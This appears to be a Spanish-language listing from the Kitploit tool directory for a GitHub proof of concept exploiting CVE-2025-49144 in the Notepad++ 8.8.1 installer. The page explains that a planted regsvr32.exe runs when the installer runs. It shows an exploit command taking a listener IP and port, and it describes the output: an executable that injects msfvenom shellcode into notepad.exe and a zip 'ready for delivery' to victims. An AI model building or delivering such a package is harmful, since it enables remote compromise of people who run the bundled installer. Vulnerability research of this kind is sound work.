Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Notepad-8.8.1_CVE-2025-49144 — Prueba de Concepto (PoC) que explota la vulnerabilidad CVE-2025-49144 en el instalador de Notepad++ 8.8.1. | Kitploit
Herramientas/GitHubGitHub/b0ysie7e/notepad-8.8.1_cve-2025-49144
Generación de PayloadsExplotaciónShellcodePruebas de PenetraciónAprendizaje y EducaciónExplotación de Binarios
GitHubb0ysie7e/notepad-8.8.1_cve-2025-49144

Notepad-8.8.1_CVE-2025-49144

Prueba de Concepto (PoC) que explota la vulnerabilidad CVE-2025-49144 en el instalador de Notepad++ 8.8.1.

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio
61hace 1 añoAún no revisado

CVE-2025-49144 – Exploit para Notepad++ 8.8.1

Este repositorio contiene un Prueba de Concepto (PoC) funcional que explota la vulnerabilidad CVE-2025-49144 en el instalador de Notepad++ 8.8.1. La ejecución maliciosa ocurre al colocar un binario (regsvr32.exe) en el mismo directorio que el instalador vulnerable. Cuando se ejecuta el instalador, hereda el contexto y activa el payload.

⚠️ Descargo de responsabilidad
Este código está destinado exclusivamente a fines educativos y de investigación. El uso no autorizado en sistemas sin permiso explícito puede constituir una violación de la ley.
El autor no es responsable por el mal uso o actividad maliciosa que involucre esta herramienta.


🧪 Requisitos

  • Python 3.x
  • msfvenom (parte de Metasploit Framework)
  • mingw-w64 (x86_64-w64-mingw32-gcc)
  • Instalador vulnerable: npp.8.8.1.Installer.x64.exe (debe colocarse manualmente en el mismo directorio)

⚙️ Uso

root@kitploit:~
python3 exploit.py -i <LHOST> -p <LPORT>

Ejemplo:

root@kitploit:~
python3 exploit.py -i 192.168.100.10 -p 4444

Esto generará los siguientes archivos:

  • regsvr32.exe: ejecutable que inyecta shellcode en un proceso remoto de notepad.exe.
  • notepad_payload.zip: archivo listo para entrega que contiene:
    • npp.8.8.1.Installer.x64.exe
    • regsvr32.exe

🎬 Demo

[Demo Preview]

Descargar herramienta